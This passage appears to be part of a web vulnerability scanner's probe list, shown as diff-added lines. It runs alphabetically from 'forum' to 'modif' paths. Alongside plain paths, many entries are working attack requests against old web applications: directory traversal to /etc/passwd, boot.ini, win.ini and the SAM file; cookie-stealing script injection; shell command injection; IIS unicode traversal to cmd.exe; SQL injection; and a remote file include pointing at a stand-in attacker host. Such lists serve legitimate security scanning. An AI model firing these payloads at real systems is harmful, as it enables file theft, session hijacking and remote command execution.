+ forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1975
+ forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1976
+ forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1977
+ forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1978
+ forum_professionnel.asp?n=100
1979
+ forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
1980
+ forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
1981
+ forums/
1982
+ forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
1983
+ forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
1984
+ forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
1985
+ forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
1986
+ forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
1987
+ foto/
1988
+ fotos/
1989
+ foxweb.dll
1990
+ foxweb.exe
1991
+ fpadmin/
1992
+ fpdb/shop.mdb
1993
+ fpsrvadm.exe
1994
+ friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
1995
+ ftp.pl
1996
+ ftp/
1997
+ ftpsh
1998
+ functions.inc.php+
1999
+ gH.cgi
2000
+ gallery/captionator.php
2001
+ gallery/errors/configmode.php
2002
+ gallery/errors/needinit.php
2003
+ gallery/errors/reconfigure.php
2004
+ gallery/errors/unconfigured.php
2005
+ gallery/index.php?include=../../../../../../../../../etc/passwd
2006
+ gallery/search.php?searchstring=<script>alert(document.cookie)</script>
2007
+ gb/index.php?login=true
2008
+ gbadmin.cgi?action=change_adminpass
2009
+ gbadmin.cgi?action=change_automail
2010
+ gbadmin.cgi?action=colors
2011
+ gbadmin.cgi?action=setup
2012
+ gbook/gbook.cgi?_MAILTO=xx;ls
2013
+ gbpass.pl
2014
+ geeklog/users.php
2015
+ general.chl+
2016
+ generate.cgi?content=../../../../../../../../../../etc
2017
+ generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
2018
+ generate.cgi?content=../../../../../../../../../../windows
2019
+ generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
2020
+ generate.cgi?content=../../../../../../../../../../winnt
2021
+ generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
2022
+ get32.exe
2023
+ get_od_toc.pl
2024
+ getaccess
2025
+ getdoc.cgi
2026
+ gettransbitmap
2027
+ gfx/
2028
+ glimpse
2029
+ global.asa
2030
+ global.inc
2031
+ global/
2032
+ globals.jsa
2033
+ globals.php3
2034
+ globals.pl
2035
+ gm-authors.cgi
2036
+ gm-cplog.cgi
2037
+ gm.cgi
2038
+ goform/CheckLogin?login=root&password=tslinux
2039
+ graphics/
2040
+ group.nsf
2041
+ groups.nsf
2042
+ guest/
2043
+ guestbook.cgi
2044
+ guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
2045
+ guestbook.pl
2046
+ guestbook/
2047
+ guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
2048
+ guestbook/admin.php
2049
+ guestbook/admin/o12guest.mdb
2050
+ guestbook/guestbook.html
2051
+ guestbook/passwd
2052
+ guests/
2053
+ handler.cgi
2054
+ hello.bat?&dir+c:\\
2055
+ help.html
2056
+ help.php?chapter=<script>alert('Vulnerable')</script>
2057
+ help/contents.htm
2058
+ help/domguide.nsf
2059
+ help/dspug.nsf
2060
+ help/help4.nsf
2061
+ help/helpadmin.nsf
2062
+ help/helplt4.nsf
2063
+ help/home.html
2064
+ help/internet.nsf
2065
+ help/javapg.nsf
2066
+ help/lccon.nsf
2067
+ help/migrate.nsf
2068
+ help/npn_admn.nsf
2069
+ help/npn_rn.nsf
2070
+ help/readmec.nsf
2071
+ help/readmes.nsf
2072
+ help/smhelp.nsf
2073
+ help/srvinst.nsf
2074
+ help4.nsf
2075
+ help5_admin.nsf
2076
+ help5_client.nsf
2077
+ help5_designer.nsf
2078
+ helpadmin.nsf
2079
+ helperfunction.php
2080
+ helplt4.nsf
2081
+ hidden.nsf
2082
+ hidden/
2083
+ hit_tracker/
2084
+ hitmatic/
2085
+ hitmatic/analyse.cgi
2086
+ hits.txt
2087
+ hitview.cgi
2088
+ home.php?arsc_language=elvish
2089
+ home/
2090
+ homebet/homebet.dll?form=menu&amp;option=menu-signin
2091
+ homepage.nsf
2092
+ homepage/
2093
+ hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
2094
+ horde/test.php
2095
+ horde/test.php?mode=phpinfo
2096
+ hostadmin/?page='
2097
+ hostingcontroller/
2098
+ hp-ux/
2099
+ hp/device/this.LCDispatcher
2100
+ hp_docs/
2101
+ hp_docs/cgi-bin/index.cgi
2102
+ hp_docs/xmltools/
2103
+ hpnst.exe?c=p+i=SrvSystemInfo.html
2104
+ hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
2105
+ hsx.cgi?show=../../../../../../../../../../../passwd%00
2106
+ ht_root/wwwroot/-/local/httpd$map.conf
2107
+ htdocs/
2108
+ htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
2109
+ htgrep?file=index.html&hdr=/etc/passwd
2110
+ htimage.exe
2111
+ htimage.exe/path/filename?2,2
2112
+ html/
2113
+ html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
2114
+ html/cgi-bin/cgicso?query=AAA
2115
+ html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
2116
+ html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
2117
+ html2chtml.cgi
2118
+ html2wml.cgi
2119
+ htmlscript?../../../../../../../../../../etc
2120
+ htmlscript?../../../../../../../../../../etc/passwd
2121
+ htmltonuke.php
2122
+ htpasswd
2123
+ htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
2124
+ htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
2125
+ htsearch?-c/nonexistant
2126
+ htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
2127
+ htsearch?exclude=%60/etc/passwd%60
2128
+ https-admserv/bin/index?/<script>alert(document.cookie)</script>
2129
+ hyperstat/stat_what.log
2130
+ i?/etc/passwd
2131
+ iNotes/Forms5.nsf
2132
+ iNotes/Forms5.nsf/$DefaultNav
2133
+ ibill.pm
2134
+ ibill/
2135
+ icat
2136
+ icons/
2137
+ idea/
2138
+ idealbb/error.asp?|-|0|404_Object_Not_Found
2139
+ ideas/
2140
+ if/admin/nph-build.cgi
2141
+ iisadmin/
2142
+ iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
2143
+ iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
2144
+ iisadmpwd/aexp2.htr
2145
+ iisadmpwd/aexp2b.htr
2146
+ iisadmpwd/aexp3.htr
2147
+ iisadmpwd/aexp4.htr
2148
+ iisadmpwd/aexp4b.htr
2149
+ iishelp/iis/htm/tutorial/redirect.asp
2150
+ iishelp/iis/misc/default.asp
2151
+ iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
2152
+ iissamples/exair/howitworks/Code.asp
2153
+ iissamples/exair/howitworks/Codebrw1.asp
2154
+ iissamples/exair/howitworks/Winmsdp.exe
2155
+ iissamples/exair/howitworks/codebrws.asp
2156
+ iissamples/exair/search/advsearch.asp
2157
+ iissamples/exair/search/query.asp
2158
+ iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
2159
+ iissamples/exair/search/search.asp
2160
+ iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
2161
+ iissamples/issamples/SQLQHit.asp
2162
+ iissamples/issamples/Winmsdp.exe
2163
+ iissamples/issamples/codebrws.asp
2164
+ iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
2165
+ iissamples/issamples/ixqlang.htm
2166
+ iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
2167
+ iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
2168
+ iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
2169
+ iissamples/issamples/sqlqhit.asp
2170
+ iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
2171
+ iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
2172
+ iissamples/sdk/asp/docs/Winmsdp.exe
2173
+ iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
2174
+ iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
2175
+ iissamples/sdk/asp/docs/codebrw2.asp
2176
+ iissamples/sdk/asp/docs/codebrws.asp
2177
+ ikonboard/help.cgi?
2178
+ image/
2179
+ imageFolio.cgi
2180
+ imagefolio/admin/admin.cgi
2181
+ imagemap
2182
+ imagemap.exe
2183
+ imagenes/
2184
+ images/
2185
+ images/?pattern=/etc/*&sort=name
2186
+ img-sys/
2187
+ img/
2188
+ imgs/
2189
+ imp/horde/test.php
2190
+ imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
2191
+ import/
2192
+ impreso/
2193
+ imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
2194
+ imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2195
+ imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2196
+ imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2197
+ imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2198
+ imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2199
+ imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2200
+ imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2201
+ imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2202
+ imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
2203
+ imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
2204
+ inc/common.load.php
2205
+ inc/config.php
2206
+ inc/dbase.php
2207
+ inc/sendmail.inc
2208
+ include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
2209
+ include/customize.php
2210
+ include/help.php
2211
+ include/new-visitor.inc.php
2212
+ includes/
2213
+ includes/adovbs.inc
2214
+ includes/footer.php3
2215
+ includes/header.php3
2216
+ incoming/
2217
+ index.html%20
2218
+ index.html.ca
2219
+ index.html.cz.iso8859-2
2220
+ index.html.de
2221
+ index.html.dk
2222
+ index.html.ee
2223
+ index.html.el
2224
+ index.html.en
2225
+ index.html.es
2226
+ index.html.et
2227
+ index.html.fr
2228
+ index.html.he.iso8859-8
2229
+ index.html.hr.iso8859-2
2230
+ index.html.it
2231
+ index.html.ja.iso2022-jp
2232
+ index.html.kr.iso2022-kr
2233
+ index.html.ltz.utf8
2234
+ index.html.lu.utf8
2235
+ index.html.nl
2236
+ index.html.nn
2237
+ index.html.no
2238
+ index.html.po.iso8859-2
2239
+ index.html.pt
2240
+ index.html.pt-br
2241
+ index.html.ru.cp-1251
2242
+ index.html.ru.cp866
2243
+ index.html.ru.iso-ru
2244
+ index.html.ru.koi8-r
2245
+ index.html.ru.utf8
2246
+ index.html.se
2247
+ index.html.tw
2248
+ index.html.tw.Big5
2249
+ index.html.var
2250
+ index.js0x70
2251
+ index.jsp%00x
2252
+ index.php/123
2253
+ index.php/\"><script><script>alert(document.cookie)</script><
2254
+ index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
2255
+ index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
2256
+ index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
2257
+ index.php?IDAdmin=test
2258
+ index.php?SqlQuery=test%20
2259
+ index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
2260
+ index.php?action=storenew&username=<script>alert('Vulnerable')</script>
2261
+ index.php?base=test%20
2262
+ index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
2263
+ index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
2264
+ index.php?dir=<script>alert('Vulnerable')</script>
2265
+ index.php?download=/etc/passwd
2266
+ index.php?download=/windows/win.ini
2267
+ index.php?download=/winnt/win.ini
2268
+ index.php?err=3&email=\"><script>alert(document.cookie)</script>
2269
+ index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
2270
+ index.php?file=index.php
2271
+ index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
2272
+ index.php?module=My_eGallery
2273
+ index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
2274
+ index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
2275
+ index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2276
+ index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2277
+ index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2278
+ index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2279
+ index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2280
+ index.php?offset=[%20Problem%20Here%20]
2281
+ index.php?option=search&searchword=<script>alert(document.cookie);</script>
2282
+ index.php?page=../../../../../../../../../../boot.ini
2283
+ index.php?page=../../../../../../../../../../etc/passwd
2284
+ index.php?pymembs=admin
2285
+ index.php?rep=<script>alert(document.cookie)</script>
2286
+ index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
2287
+ index.php?sql_debug=1
2288
+ index.php?tampon=test%20
2289
+ index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
2290
+ index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
2291
+ index.php?vo=\"><script>alert(document.cookie);</script>
2292
+ index.php?|=../../../../../../../../../etc/passwd
2293
+ index.pl
2294
+ info.php
2295
+ info/
2296
+ info2www
2297
+ info2www '(../../../../../../../bin/mail root </etc/passwd>
2298
+ informacion/
2299
+ information/
2300
+ infos/contact/index.asp
2301
+ infos/faq/index.asp
2302
+ infos/gen/index.asp
2303
+ infos/services/index.asp
2304
+ infosrch.cgi
2305
+ ingresa/
2306
+ ingreso/
2307
+ input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
2308
+ input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
2309
+ instaboard/index.cfm
2310
+ install/
2311
+ install/install.php
2312
+ instantwebmail/message.php
2313
+ interchange/
2314
+ internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
2315
+ internal.sws?../../../../../../../../winnt/win.ini
2316
+ internal/
2317
+ internet.nsf
2318
+ interscan/
2319
+ interscan/cgi-bin/FtpSave.dll?I'm%20Here
2320
+ intranet/
2321
+ intranet/browse.php
2322
+ invitado/
2323
+ invitados/
2324
+ invitefriends.php3
2325
+ ion-p.exe?page=c:\winnt\repair\sam
2326
+ ion-p?page=../../../../../etc/passwd
2327
+ ip.txt
2328
+ ipchat.php
2329
+ isapi/count.pl?
2330
+ isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
2331
+ isapi/tstisapi.dll
2332
+ isqlplus
2333
+ isx.html
2334
+ ixmail_netattach.php
2335
+ j2ee/
2336
+ jailshell
2337
+ jamdb/
2338
+ java-plugin/
2339
+ java-sys/
2340
+ java/
2341
+ javadoc/
2342
+ javapg.nsf
2343
+ javax
2344
+ jdbc/
2345
+ jgb_eng_php3/cfooter.php3
2346
+ jigsaw/
2347
+ jj
2348
+ job/
2349
+ jotter.nsf
2350
+ journal.cgi?folder=journal.cgi%00
2351
+ jrun/
2352
+ js
2353
+ jservdocs/
2354
+ jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
2355
+ jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
2356
+ jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
2357
+ jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
2358
+ jspdocs/
2359
+ jsptest.jsp+
2360
+ junk.aspx
2361
+ k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
2362
+ kbccv11.nsf
2363
+ kbnv11.nsf
2364
+ kbssvv11.nsf
2365
+ kernel/class/delete.php
2366
+ kernel/classes/ezrole.php
2367
+ krysalis/
2368
+ ksh
2369
+ l_domlog.nsf
2370
+ lastlines.cgi?process
2371
+ launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
2372
+ launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
2373
+ launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
2374
+ lccon.nsf
2375
+ lcgi/lcgitest.nlm
2376
+ lcgi/ndsobj.nlm
2377
+ lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
2378
+ lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
2379
+ lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
2380
+ lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
2381
+ lcon.nsf
2382
+ ldap.nsf
2383
+ ldap.search.php3?ldap_serv=nonsense%20
2384
+ ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
2385
+ leiadm.nsf
2386
+ leilog.nsf
2387
+ leivlt.nsf
2388
+ level/16
2389
+ level/16/exec/
2390
+ level/16/exec/-///pwd
2391
+ level/16/exec/-///show/configuration
2392
+ level/16/exec//show
2393
+ level/16/exec//show/access-lists
2394
+ level/16/level/16/exec//show/configuration
2395
+ level/16/level/16/exec//show/interfaces
2396
+ level/16/level/16/exec//show/interfaces/status
2397
+ level/16/level/16/exec//show/running-config/interface/FastEthernet
2398
+ level/16/level/16/exec//show/version
2399
+ level/17/exec//show
2400
+ level/18/exec//show
2401
+ level/19/exec//show
2402
+ level/20/exec//show
2403
+ level/21/exec//show
2404
+ level/22/exec//show
2405
+ level/23/exec//show
2406
+ level/24/exec//show
2407
+ level/25/exec//show
2408
+ level/26/exec//show
2409
+ level/27/exec//show
2410
+ level/28/exec//show
2411
+ level/29/exec//show
2412
+ level/30/exec//show
2413
+ level/31/exec//show
2414
+ level/32/exec//show
2415
+ level/33/exec//show
2416
+ level/34/exec//show
2417
+ level/35/exec//show
2418
+ level/36/exec//show
2419
+ level/37/exec//show
2420
+ level/38/exec//show
2421
+ level/39/exec//show
2422
+ level/40/exec//show
2423
+ level/41/exec//show
2424
+ level/42/exec//show
2425
+ level/42/exec/show%20conf
2426
+ level/43/exec//show
2427
+ level/44/exec//show
2428
+ level/45/exec//show
2429
+ level/46/exec//show
2430
+ level/47/exec//show
2431
+ level/48/exec//show
2432
+ level/49/exec//show
2433
+ level/50/exec//show
2434
+ level/51/exec//show
2435
+ level/52/exec//show
2436
+ level/53/exec//show
2437
+ level/54/exec//show
2438
+ level/55/exec//show
2439
+ level/56/exec//show
2440
+ level/57/exec//show
2441
+ level/58/exec//show
2442
+ level/59/exec//show
2443
+ level/60/exec//show
2444
+ level/61/exec//show
2445
+ level/62/exec//show
2446
+ level/63/exec//show
2447
+ level/64/exec//show
2448
+ level/65/exec//show
2449
+ level/66/exec//show
2450
+ level/67/exec//show
2451
+ level/68/exec//show
2452
+ level/69/exec//show
2453
+ level/70/exec//show
2454
+ level/71/exec//show
2455
+ level/72/exec//show
2456
+ level/73/exec//show
2457
+ level/74/exec//show
2458
+ level/75/exec//show
2459
+ level/76/exec//show
2460
+ level/77/exec//show
2461
+ level/78/exec//show
2462
+ level/79/exec//show
2463
+ level/80/exec//show
2464
+ level/81/exec//show
2465
+ level/82/exec//show
2466
+ level/83/exec//show
2467
+ level/84/exec//show
2468
+ level/85/exec//show
2469
+ level/86/exec//show
2470
+ level/87/exec//show
2471
+ level/88/exec//show
2472
+ level/89/exec//show
2473
+ level/90/exec//show
2474
+ level/91/exec//show
2475
+ level/92/exec//show
2476
+ level/93/exec//show
2477
+ level/94/exec//show
2478
+ level/95/exec//show
2479
+ level/96/exec//show
2480
+ level/97/exec//show
2481
+ level/98/exec//show
2482
+ level/99/exec//show
2483
+ lib/
2484
+ library/
2485
+ libro/
2486
+ linux/
2487
+ listrec.pl
2488
+ livehelp/
2489
+ livredor/index.php
2490
+ loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
2491
+ loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
2492
+ loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
2493
+ local/httpd$map.conf
2494
+ localstart.asp
2495
+ log-reader.cgi
2496
+ log.htm
2497
+ log.html
2498
+ log.nsf
2499
+ log.txt
2500
+ log/
2501
+ log/nether-log.pl?checkit
2502
+ log4a.nsf
2503
+ logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
2504
+ logfile
2505
+ logfile.htm
2506
+ logfile.html
2507
+ logfile.txt
2508
+ logfile/
2509
+ logfiles/
2510
+ logger.html
2511
+ logger/
2512
+ logging/
2513
+ logicworks.ini
2514
+ login.cgi
2515
+ login.jsp
2516
+ login.php3?reason=chpass2%20
2517
+ login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
2518
+ login.pl
2519
+ login.pl?course_id=\
2520
+ login/
2521
+ login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
2522
+ login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
2523
+ logins.html
2524
+ logit.cgi
2525
+ logjam/showhits.php
2526
+ logs.pl
2527
+ logs.txt
2528
+ logs/
2529
+ logs/access_log
2530
+ logs/error_log
2531
+ logs/str_err.log
2532
+ lookwho.cgi
2533
+ lost+found/
2534
+ lpt9
2535
+ lpt9.xtp
2536
+ ls
2537
+ lsxlc.nsf
2538
+ lwgate
2539
+ lwgate.cgi
2540
+ mab.nsf
2541
+ magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
2542
+ magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
2543
+ mail
2544
+ mail.box
2545
+ mail/
2546
+ mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
2547
+ mail/adminisist.nsf
2548
+ mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
2549
+ mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
2550
+ mail/include.html
2551
+ mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
2552
+ mail/settings.html
2553
+ mail/src/read_body.php
2554
+ mail1.box
2555
+ mail10.box
2556
+ mail2.box
2557
+ mail3.box
2558
+ mail4.box
2559
+ mail5.box
2560
+ mail6.box
2561
+ mail7.box
2562
+ mail8.box
2563
+ mail9.box
2564
+ mailform.exe
2565
+ mailit.pl
2566
+ maillist.cgi
2567
+ maillist.pl
2568
+ mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
2569
+ mailman/listinfo
2570
+ mailman/listinfo/<script>alert('Vulnerable')</script>
2571
+ mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
2572
+ mailnews.cgi
2573
+ mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
2574
+ mailw46.nsf
2575
+ main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
2576
+ main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
2577
+ main_page.php
2578
+ majordomo.pl
2579
+ mall_log_files/order.log
2580
+ mambo/administrator/phpinfo.php
2581
+ mambo/banners.php
2582
+ mambo/index.php?Itemid=JUNK(5)
2583
+ man.sh
2584
+ man2html
2585
+ manage/cgi/cgiproc
2586
+ manage/login.asp+
2587
+ manager/
2588
+ manager/html-manager-howto.html
2589
+ manager/manager-howto.html
2590
+ mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
2591
+ manual.php
2592
+ manual/
2593
+ manual/ag/esperfrm.htm
2594
+ manual/images/
2595
+ manual/servlets/scripts/servlet1/servform.htm
2596
+ manual/servlets/scripts/shoes/shoeform.htm
2597
+ market/
2598
+ marketing/
2599
+ master.password
2600
+ mastergate/search.cgi?search=0&search_on=all
2601
+ mbox
2602
+ mc-icons/
2603
+ mcartfree/database/metacart.mdb
2604
+ megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
2605
+ megabook/files/20/setup.db
2606
+ members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
2607
+ members/
2608
+ members/ID.pm
2609
+ members/ID.xbb
2610
+ message/
2611
+ messaging/
2612
+ meta.pl
2613
+ metacart/database/metacart.mdb
2614
+ mgrqcgi
2615
+ midicart.mdb
2616
+ migrate.nsf
2617
+ mini_logger.cgi
2618
+ minimal.exe
2619
+ ministats/admin.cgi
2620
+ misc/
2621
+ mkilog.exe
2622
+ mkplog.exe
2623
+ mkstats/
2624
+ mlog.html
2625
+ mlog.phtml
2626
+ mmstdod.cgi
2627
+ mod.php
2628
+ mod_ose_docs
2629
+ modif/delete.php
2630
+ modif/ident.php
2631
+ modif_infos.asp?n=%60/etc/passwd%60
2632
+ modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
2633
+ modif_infos.asp?n=../../../../../../../../../etc/passwd%00
2634
+ modif_infos.asp?n=/....../boot.ini
2635
+ modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
2636
+ modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
2637
+ modif_infos.asp?n=/../../../../../../../../../etc/passwd
2638
+ modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
2639
+ modif_infos.asp?n=/etc/passwd
2640
+ modif_infos.asp?n=/etc/passwd%00
2641
